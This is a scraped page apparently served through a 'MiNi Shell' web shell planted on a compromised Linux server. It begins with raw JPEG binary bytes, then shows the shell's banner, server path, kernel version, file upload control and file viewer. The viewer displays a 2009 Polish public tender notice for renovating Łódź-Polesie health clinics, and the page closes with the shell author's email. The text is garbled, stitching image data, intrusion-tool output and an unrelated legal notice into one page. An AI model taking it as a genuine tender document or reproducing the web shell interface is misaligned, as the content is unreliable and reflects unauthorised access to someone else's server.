JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090409/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090409/100064-N-2009.html

<p class="kh_header"><b>Łódź: remontu i modernizacji  Zakładu Rehabilitacji Leczniczej, ul. Gdańska 83 
oraz Specjalistycznej Przychodni dla Dzieci i Młodzieży, ul. A. Struga 86 w Łodzi
Znak sprawy:  ZP / 2 / 2009r.</b><br>
<b>Numer ogłoszenia: 100064 - 2009; data zamieszczenia: 09.04.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zespół Opieki Zdrowotnej Łódź-Polesie , ul. Andrzeja Struga 86, 90-557 Łódź, woj. łódzkie, tel. centr. 042 6372047 sek 6376450, faks 042 6371373.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zozlodzpolesie.eu</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> remontu i modernizacji  Zakładu Rehabilitacji Leczniczej, ul. Gdańska 83 
oraz Specjalistycznej Przychodni dla Dzieci i Młodzieży, ul. A. Struga 86 w Łodzi
Znak sprawy:  ZP / 2 / 2009r..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia stanowi wykonanie prac remontowo-modernizacyjnych                        dwóch obiektów/przychodni Zamawiającego, określonych w punkcie nr 5 specyfikacji. Prace będą prowadzone w celu dostosowanie tych obiektów do wymogów Rozporządzenia Ministra Zdrowia z dnia 10.11.2006r. w sprawie wymagań, jakim powinny odpowiadać pod względem fachowym i sanitarnym pomieszczenia i urządzenia zakładu opieki zdrowotnej  (Dz. U. z 2006r., Nr  213, poz. 1568). 
Pełen zakres zadania inwestycyjnego zawiera dokumentacja projektowa oraz specyfikacja techniczna wykonania  i odbioru robót dostępna do wglądu w siedzibie Zamawiającego oraz na stronie internetowej: www.zozlodzpolesie.eu.
Zainteresowanym Wykonawcom Zamawiający zaleca dokonanie wizji lokalnej obiektów,                    
           w celu uzyskania wszelkich informacji niezbędnych do przygotowania i złożenia oferty -                  
           Wykonawca zgłasza się do Kierownika Przychodni, który wyznaczy osobę oprowadzającą  
           po obiekcie.
Zadanie uznane zostanie za zakończone z chwilą końcowego odbioru prac przez Powiatowego Inspektora Nadzoru Budowlanego..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.40.00.00-1, 45.11.12.00-0, 45.41.00.00-4, 45.44.21.00-8, 45.43.21.00-5, 45.42.10.00-4, 45.31.10.00-0, 45.33.00.00-9, 45.33.12.00-8, 45.33.31.00-7, 45.26.25.00-6.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Rozpoczęcie: 01.06.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Wykonawcy składający ofertę są zobowiązani do wniesienia  wadium  w wysokości                                         
           Cześć 1 zamówienia  -   2.000,- zł  (dwa tys. zł)
           Część 2 zamówienia  -   2.000,- zł  (dwa tys. zł).
Wadium może być wnoszone w jednej lub kilu następujących formach:
pieniądzu,
poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym,
gwarancjach bankowych,
gwarancjach ubezpieczeniowych,
poręczeniach udzielanych przez podmioty, o których mowa w art. 6 b ust. 5 pkt 2 ustawy     z dnia  09 listopada 2000r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości     (Dz. U. Nr 109,  poz. 1158, z późniejszymi zmianami).
Wadium wnoszone w pieniądzu Wykonawca jest zobowiązany wpłacić przelewem na       
            rachunek  bankowy Zamawiającego w GETIN BANK  nr rachunku  37 1560 0013 2026    
            0000 1371 0001 z dopiskiem WADIUM ZP/2/2009r.  lub w kasie Zamawiającego czynnej    
            w: pn. śr. pt. w godzinach 11:00 - 15:00.
Wadium uważa się za wniesione skutecznie wówczas, gdy przed upływem terminu do       
            złożenia  ofert nastąpi uznanie rachunku Zamawiającego, zaś dowód wniesienia wadium  
            (kopia lub ksero) zostanie dołączony do oferty.
Wadium wnoszone w formie innej niż pieniężna musi spełniać następujące wymagania:
musi odpowiadać co do wartości wysokości wadium określonej w SIWZ,
musi odpowiadać co do terminu ważności terminowi związania ofertą, określonemu                      w SIWZ
musi zawierać w swej treści okoliczności, w których gwarant (poręczyciel) wypłaci kwotę wadium Zamawiającemu, wraz z klauzulą mówiącą, że wypłata nastąpi na pierwsze żądanie Zamawiającego,
musi być podpisane przez osobę lub osoby upoważnione do reprezentacji gwaranta (poręczyciela). 
Wykonawca, który nie wniesie wadium zostanie wykluczony z postępowania.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> O udzielenie zamówienia ubiegać się mogą wykonawcy spełniający następujące warunki:     
1.nie podlegają wykluczeniu z udziału w postępowaniu na podstawie art.24  ust. 1 i 2              
            ustawy  z dnia  29 stycznia 2004r. - Prawo zamówień publicznych,
2.posiadają uprawnienia do wykonywania określonej działalności lub czynności,  jeżeli 	        
ustawy nakładają obowiązek posiadania takich uprawnień,
3.posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym  
i osobami zdolnymi do wykonania zamówienia, 
4.znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie  
zamówienia,
5.     zapewnią realizację zamówienia w terminie określonym w punkcie 5 niniejszej  
specyfikacji,
5.wyrażą zgodę na 21 dniowy terminy płatności,
6.na wykonany przedmiot zamówienia udzielą co najmniej 36-cio miesięcznego okresu   
gwarancji.
Oceny spełniania tych warunków Zamawiający dokona na podstawie złożonych dokumentów  oraz oświadczeń, metodą spełnia / nie spełnia..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> W celu potwierdzenia spełniania przez Wykonawcę warunków określonych w punkcie nr 6      niniejszej specyfikacji, Wykonawca załączy  do oferty w formie  oryginału lub kserokopii poświadczonej  za  zgodność  z  oryginałem  przez  Wykonawcę,  następujące  dokumenty:
1. 	Oświadczenie, że Wykonawca spełnia wymagania art. 22 ustawy Pzp -  załącznik nr 3.
2. 	Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
3. 	W przypadku, gdy Wykonawcą jest spółka cywilna lub jawna, obowiązuje dołączenie 
       	umowy tej spółki.
4. 	Wykaz osób i podmiotów, które będą uczestniczyć w wykonywaniu zamówienia, wraz             z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nich czynności - załącznik nr 7.
5. 	W przypadku gdy Wykonawca przewiduje wykorzystanie podwykonawców, Zamawiający żąda dołączenie wykazu podwykonawców z określonym zakresem powierzonych im części zamówienia oraz oświadczeniami podwykonawców, o gotowości do współpracy - załącznik nr 6.
6.Wykaz  prac odpowiadających swoim rodzajem i wartością  przedmiotowi niniejszego zamówienia, wykonanych w okresie ostatnich trzech lata przed dniem wszczęcia przedmiotowego postępowania, a jeżeli okres prowadzenia działalności jest krótszy -              w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorów, oraz załączenia dokumentów potwierdzających, że prace zostały wykonane należycie - załącznik nr 5. 
7. 	Oświadczenie   Wykonawcy o dokonaniu wizji lokalnej - załącznik nr 4.
8.Kosztorys ofertowy części zamówienia, której dotyczy oferta, sporządzony wg załączonych przedmiarów zawartych w dokumentacji projektowej.  
9.Potwierdzenie wniesienia wadium - kopia lub ksero dowodu wpłaty lub przelewu.
10.Parafowany wzór umowy - załącznik nr 8.
11.   Oryginała lub notarialnie potwierdzoną kserokopie pełnomocnictwa dla osoby lub osób 
podpisujących ofertę - upoważnionej/ych do składania woli i do podejmowania zobowiązań w imieniu Wykonawcy, jeżeli upoważnienie takie nie wynika z dokumentów rejestracyjnych działalności. Pełnomocnictwo winno jednoznacznie wskazywać osobę lub osoby pełnomocnika poprzez  wskazanie jego  podstawowych danych identyfikacyjnych.
12. 	Brak jakiegokolwiek z wyżej wymienionych dokumentów lub złożenie ich w   
          	niewłaściwej formie, spowoduje odrzucenie oferty. Uzupełnienie złożonych dokumentów  
           po  upływie terminu składania ofert jest możliwe na podstawie art. 26 ust. 3 ustawy Prawo   
           zamówień publicznych.  
13. 	Złożenie przez Wykonawcę  fałszywych lub stwierdzenia nieprawdziwych  dokumentów 
          	oraz oświadczeń, zgodnie z art.24 ust. 2 ustawy Pzp spowoduje wykluczenie go                           
            z postępowania przetargowego.
14.	W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, oświadczenia i dokumenty wymienione w pkt 1 , 2 oraz 7 zostaną przedłożone przez każdego z Wykonawców. 
15.Wykonawcy wspólnie ubiegający się o zamówienie winni ustanowić pełnomocnika do reprezentowania ich w postępowaniu albo reprezentowania w postępowaniu i zawarcia umowy w sprawie niniejszego zamówienia, stosownie do art. 23 ust. 2 ustawy Pzp.
16.Dokument pełnomocnictwa musi być załączony do oferty i zawierać w szczególności wskazanie: postępowania o zamówienie publiczne, którego dotyczy, Wykonawców ubiegających się wspólnie o udzielenie zamówienia, ustanowionego Wykonawcę - Pełnomocnika oraz zakres jego umocowania.
17.Dokument pełnomocnictwa musi być podpisany w imieniu wszystkich Wykonawców ubiegających się wspólnie o udzielenie zamówienia, w tym Wykonawcę ustawionego jako Pełnomocnika i przez osoby uprawnione do składania oświadczeń woli wymienione we właściwym rejestrze lub ewidencji działalności gospodarczej Wykonawcy.
18.    Dokument pełnomocnictwa musi zostać złożony jako część oferty, musi być w oryginale    
            lub kopii poświadczonej za zgodność z oryginałem przez notariusza.
19.   Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania za granicą, składa dokumenty    
            wg zasad określonych w Rozporządzeniu Prezesa Rady Ministrów z dnia 19 maja 2006r.   
            (Dz. U. z 2006r., Nr 87, poz. 605). 
20.Wykonawca składający ofertę dotyczącą obu części zamówienia, załącza jeden komplet dokumentów określonych powyżej ..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.zozlodzpolesie.eu.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zespół Opieki Zdrowotnej Łódź-Polesie
ul. Andrzeja Struga 86
90-557 Łódź.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 30.04.2009 godzina 12:00, miejsce: Oferty należy składać w  sekretariacie,  pok.  nr  1  (I piętro)..</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com